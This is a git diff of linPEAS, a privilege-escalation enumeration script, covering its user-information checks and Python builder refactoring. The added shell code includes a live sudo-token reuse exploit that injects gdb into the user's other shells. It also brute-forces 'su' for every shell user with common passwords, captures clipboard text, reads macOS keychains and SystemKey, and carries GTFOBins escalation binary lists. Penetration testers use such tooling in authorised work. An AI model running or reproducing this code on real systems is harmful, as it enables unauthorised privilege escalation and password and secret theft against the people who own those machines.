"s,disabled,${SED_RED}," + +#-- SY) Gatekeeper +if [ "$MACPEAS" ]; then + print_list "Gatekeeper enabled? .......... "$NC + (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," + + print_list "sleepimage encrypted? ........ "$NC + (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no + + print_list "XProtect? .................... "$NC + (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no + + print_list "SIP enabled? ................. "$NC + csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no + + print_list "Connected to JAMF? ........... "$NC + warn_exec jamf checkJSSConnection + + print_list "Connected to AD? ............. "$NC + dsconfigad -show && echo "" || echo_no +fi + +#-- SY) ASLR +print_list "Is ASLR enabled? ............... "$NC +ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) +if [ -z "$ASLR" ]; then + echo_not_found "/proc/sys/kernel/randomize_va_space"; +else + if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi + echo "" +fi + +#-- SY) Printer +print_list "Printer? ....................... "$NC +(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null + +#-- SY) Running in a virtual environment +print_list "Is this a virtual machine? ..... "$NC +hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) +if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then + detectedvirt=$(systemd-detect-virt) + if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi +else + if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi +fi diff --git a/linPEAS/builder/linpeas_parts/users_information.sh b/linPEAS/builder/linpeas_parts/users_information.sh new file mode 100644 index 0000000..d0de135 --- /dev/null +++ b/linPEAS/builder/linpeas_parts/users_information.sh @@ -0,0 +1,226 @@ +########################################### +#----------) Users Information (----------# +########################################### +print_title "Users Information" + +#-- UI) My user +print_2title "My user" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" +echo "" + +if [ "$MACPEAS" ];then + print_2title "Current user Login and Logout hooks" + defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + echo "" + + print_2title "All Login and Logout hooks" + defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist + echo "" + + print_2title "Keychains" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" + security list-keychains + echo "" + + print_2title "SystemKey" + ls -l /var/db/SystemKey + if [ -r "/var/db/SystemKey" ]; then + echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi + echo "" +fi + +#-- UI) PGP keys? +print_2title "Do I have PGP keys?" +command -v gpg 2>/dev/null || echo_not_found "gpg" +gpg --list-keys 2>/dev/null +command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" +netpgpkeys --list-keys 2>/dev/null +command -v netpgp 2>/dev/null || echo_not_found "netpgp" +echo "" + +#-- UI) Clipboard and highlighted text +print_2title "Clipboard or highlighted text?" +if [ "$(command -v xclip 2>/dev/null)" ]; then + echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +elif [ "$(command -v xsel 2>/dev/null)" ]; then + echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +elif [ "$(command -v pbpaste 2>/dev/null)" ]; then + echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +else echo_not_found "xsel and xclip" +fi +echo "" + +#-- UI) Sudo -l +print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +(echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" +if [ "$PASSWORD" ]; then + (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" +fi +( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" +if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then + echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," +fi +for filename in '/etc/sudoers.d/*'; do + if [ -r "$filename" ]; then + echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" + grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," + fi +done +echo "" + +#-- UI) Sudo tokens +print_2title "Checking sudo tokens" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" +ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; +else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; +fi +is_gdb="$(command -v gdb 2>/dev/null)" +if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; +else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; +fi +if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then + echo "Checking for sudo tokens in other shells owned by current user" + for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do + echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) + echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 + if [ -f "/tmp/shrndom32r2r" ]; then + echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + break + fi + done + if [ -f "/tmp/shrndom32r2r" ]; then + rm -f /tmp/shrndom32r2r 2>/dev/null + else echo "The escalation didn't work... (try again later?)" + fi +fi +echo "" + +#-- UI) Doas +print_2title "Checking doas.conf" +doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) +if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then + cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," +else echo_not_found "doas.conf" +fi +echo "" + +#-- UI) Pkexec policy +print_2title "Checking Pkexec policy" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" +(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" +echo "" + +#-- UI) Superusers +print_2title "Superusers" +awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Users with console +print_2title "Users with console" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" + fi + done +else + no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) + unexpected_shells="" + printf "%s\n" "$no_shells" | while read f; do + if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then + unexpected_shells="$f\n$unexpected_shells" + fi + done + grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + if [ "$unexpected_shells" ]; then + printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" + echo "Unexpected users with shells:" + printf "%s\n" "$unexpected_shells" | while read f; do + if [ "$f" ]; then + grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" + fi + done + fi +fi +echo "" + +#-- UI) All users & groups +print_2title "All users & groups" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +else + cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +fi +echo "" + +#-- UI) Login now +print_2title "Login now" +(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Last logons +print_2title "Last logons" +(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Login info +print_2title "Last time logon each user" +lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + +EXISTS_FINGER="$(command -v finger 2>/dev/null)" +if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" + fi + done +fi +echo "" + +#-- UI) Password policy +print_2title "Password policy" +grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Relevant last user info and user configs" + defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null + echo "" + + print_2title "Guest user status" + sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + echo "" +fi + +#-- UI) Brute su +EXISTS_SUDO="$(command -v sudo 2>/dev/null)" +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then + print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC + POSSIBE_SU_BRUTE=$(check_if_su_brute); + if [ "$POSSIBE_SU_BRUTE" ]; then + SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) + printf "%s\n" "$SHELLUSERS" | while read u; do + echo " Bruteforcing user $u..." + su_brute_user_num "$u" $PASSTRY + done + else + printf $GREEN"It's not possible to brute-force su.\n\n"$NC + fi +else + print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC +fi +print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC \ No newline at end of file diff --git a/linPEAS/builder/src/linpeasBaseBuilder.py b/linPEAS/builder/src/linpeasBaseBuilder.py new file mode 100644 index 0000000..b7a7ea2 --- /dev/null +++ b/linPEAS/builder/src/linpeasBaseBuilder.py @@ -0,0 +1,37 @@ +from .yamlGlobals import ( + LINPEAS_PARTS, + LINPEAS_BASE_PATH, + TEMPORARY_LINPEAS_BASE_PATH, + PEAS_CHECKS_MARKUP +) + +class LinpeasBaseBuilder: + def __init__(self): + with open(LINPEAS_BASE_PATH, 'r') as file: + self.linpeas_base = file.read() + + def build(self): + print("[+] Building temporary linpeas_base.sh...") + checks = [] + for part in LINPEAS_PARTS: + name = part["name"] + assert name, f"Name not found in {part}" + name_check = part["name_check"] + assert name_check, f"Name not found in {name_check}" + file_path = part["file_path"] + assert file_path, f"Name not found in {file_path}" + + with open(file_path, 'r') as file: + linpeas_part = file.read() + + checks.append(name_check) + self.linpeas_base += f"\nif echo $CHECKS | grep -q {name_check};\n" + self.linpeas_base += f'print_title "{name}"\n' + self.linpeas_base += linpeas_part + self.linpeas_base += f"\nfi\necho ''\necho ''\n" + self.linpeas_base += 'if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi\n' + + self.linpeas_base = self.linpeas_base.replace(PEAS_CHECKS_MARKUP, ",".join(checks)) + + with open(TEMPORARY_LINPEAS_BASE_PATH, "w") as f: + f.write(self.linpeas_base) diff --git a/linPEAS/builder/src/linpeasBuilder.py b/linPEAS/builder/src/linpeasBuilder.py index 7880e48..2139467 100644 --- a/linPEAS/builder/src/linpeasBuilder.py +++ b/linPEAS/builder/src/linpeasBuilder.py @@ -1,12 +1,13 @@ import re import requests import base64 +import os from .peasLoaded import PEASLoaded from .peassRecord import PEASRecord from .fileRecord import FileRecord from .yamlGlobals import ( - LINPEAS_BASE_PATH, + TEMPORARY_LINPEAS_BASE_PATH, PEAS_FINDS_MARKUP, PEAS_STORAGES_MARKUP, PEAS_STORAGES_MARKUP, @@ -38,7 +39,7 @@ class LinpeasBuilder: self.bash_find_f_vars, self.bash_find_d_vars = set(), set() self.bash_storages = set() self.__get_files_to_search() - with open(LINPEAS_BASE_PATH, 'r') as file: + with open(TEMPORARY_LINPEAS_BASE_PATH, 'r') as file: self.linpeas_sh = file.read() def build(self): @@ -309,9 +310,13 @@ class LinpeasBuilder: def __replace_mark(self, mark: str, find_calls: list, join_char: str): """Substitude the markup with the actual code""" + self.linpeas_sh = self.linpeas_sh.replace(mark, join_char.join(find_calls)) #New line char is't needed def write_linpeas(self, path): """Write on disk the final linpeas""" + with open(path, "w") as f: - f.write(self.linpeas_sh) \ No newline at end of file + f.write(self.linpeas_sh) + + os.remove(TEMPORARY_LINPEAS_BASE_PATH) #Remove the built linpeas_base.sh file \ No newline at end of file diff --git a/linPEAS/builder/src/yamlGlobals.py b/linPEAS/builder/src/yamlGlobals.py index 8634b9c..3064a4f 100644 --- a/linPEAS/builder/src/yamlGlobals.py +++ b/linPEAS/builder/src/yamlGlobals.py @@ -2,7 +2,54 @@ import os import yaml CURRENT_DIR = os.path.dirname(os.path.realpath(__file__)) -LINPEAS_BASE_PATH = CURRENT_DIR + "/../linpeas_base.sh" + +LINPEAS_BASE_PARTS = CURRENT_DIR + "/../linpeas_parts" +LINPEAS_PARTS = [ + { + "name": "System Information", + "name_check": "system_information", + "file_path": LINPEAS_BASE_PARTS + "/system_information.sh" + }, + { + "name": "Container", + "name_check": "container", + "file_path": LINPEAS_BASE_PARTS + "/container.sh" + }, + { + "name": "Available Software", + "name_check": "available_software", + "file_path": LINPEAS_BASE_PARTS + "/available_software.sh" + }, + { + "name": "Processes, Crons, Timers, Services and Sockets", + "name_check": "procs_crons_timers_srvcs_sockets", + "file_path": LINPEAS_BASE_PARTS + "/procs_crons_timers_srvcs_sockets.sh" + }, + { + "name": "Network Information", + "name_check": "network_information", + "file_path": LINPEAS_BASE_PARTS + "/network_information.sh" + }, + { + "name": "Users Information", + "name_check": "users_information", + "file_path": LINPEAS_BASE_PARTS + "/users_information.sh" + }, + { + "name": "Software Information", + "name_check": "software_information", + "file_path": LINPEAS_BASE_PARTS + "/software_information.sh" + }, + { + "name": "Interesting Files", + "name_check": "interesting_files", + "file_path": LINPEAS_BASE_PARTS + "/interesting_files.sh" + } +] + + +LINPEAS_BASE_PATH = LINPEAS_BASE_PARTS + "/linpeas_base.sh" +TEMPORARY_LINPEAS_BASE_PATH = CURRENT_DIR + "/../linpeas_base.sh" FINAL_LINPEAS_PATH = CURRENT_DIR + "/../../" + "linpeas.sh" YAML_NAME = "sensitive_files.yaml" FILES_YAML = CURRENT_DIR + "/../../../build_lists/" + YAML_NAME @@ -18,6 +65,7 @@ assert all(f in ROOT_FOLDER for f in COMMON_FILE_FOLDERS) assert all(f in ROOT_FOLDER for f in COMMON_DIR_FOLDERS) +PEAS_CHECKS_MARKUP = YAML_LOADED["peas_checks"] PEAS_FINDS_MARKUP = YAML_LOADED["peas_finds_markup"] FIND_LINE_MARKUP = YAML_LOADED["find_line_markup"] FIND_TEMPLATE = YAML_LOADED["find_template"] diff --git a/linPEAS/linpeas.sh b/linPEAS/linpeas.sh index 56bdd0c..fc368bb 100755 --- a/linPEAS/linpeas.sh +++ b/linPEAS/linpeas.sh @@ -56,7 +56,7 @@ NOTEXPORT="" DISCOVERY="" PORTS="" QUIET="" -CHECKS="SysI,Container,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles" +CHECKS="system_information,container,available_software,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files" WAIT="" PASSWORD="" NOCOLOR="" @@ -77,7 +77,7 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, ${YELLOW}-N${BLUE} Do not use colours ${YELLOW}-v${BLUE} Verbose execution ${YELLOW}-P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' - ${YELLOW}-o${BLUE} Only execute selected checks (SysI, Container, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list. + ${YELLOW}-o${BLUE} Only execute selected checks (system_information,container,available_software,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files). Select a comma separated list. ${YELLOW}-L${BLUE} Force linpeas execution. ${YELLOW}-M${BLUE} Force macpeas execution. ${YELLOW}-d ${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 @@ -365,8 +365,8 @@ sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\ /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)" #To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|' -sidVB='/ar$|/aria2c$|/arj$|/arp$|/as$|/ash$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/latex$|/ldconfig$|/less$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$|/msguniq$' -sidVB2='/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pg$|/php$|/pic$|/pico$|/pr$|/pry$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/run-parts$|/rview$|/rvim$|/scp$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/zip$|/zsh$|/zsoelim$' +sidVB='/ar$|/aria2c$|/arj$|/arp$|/as$|/ash$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/genisoimage$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/latex$|/ldconfig$|/less$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$' +sidVB2='/msguniq$|/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pg$|/php$|/pic$|/pico$|/pr$|/pry$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/run-parts$|/rview$|/rvim$|/scp$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/zip$|/zsh$|/zsoelim$' cfuncs='file|free|main|more|read|split|write' sudoVB1=" \*|env_keep\+=LD_PRELOAD|ansible-playbook$|apt-get$|apt$|ar$|aria2c$|arj$|arp$|as$|ash$|at$|atobm$|awk$|base32$|base64$|basenc$|bash$|bpftrace$|bridge$|bundler$|busctl$|busybox$|byebug$|bzip2$|c89$|c99$|capsh$|cat$|certbot$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|chown$|chroot$|cmp$|cobc$|column$|comm$|composer$|cowsay$|cowthink$|cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|csh$|csplit$|csvtool$|cupsfilter$|curl$|cut$|dash$|date$|dd$|dialog$|diff$|dig$|dmesg$|dmidecode$|dmsetup$|dnf$|docker$|dosbox$|dpkg$|dvips$|easy_install$|eb$|ed$|emacs$|env$|eqn$|ex$|exiftool$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gawk$|gcc$|gcore$|gdb$|gem$|genisoimage$|ghc$|ghci$|gimp$|git$|grep$|gtester$|gzip$|hd$|head$|hexdump$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|ip$|irb$|jjs$|join$|journalctl$|jq$|jrunscript$|knife$|ksh$|ksshell$|latex$|ldconfig$|less$|ln$|loginctl$|logsave$|look$|ltrace$|lua$|lualatex$|luatex$|lwp-download$|lwp-request$|mail$|make$|man$|mawk$|more$|mount$" @@ -1086,144 +1086,145 @@ if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFil CONT_THREADS=0 # FIND ALL KNOWN INTERESTING SOFTWARE FILES - FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \"environments\" -o -name \"logstash\" 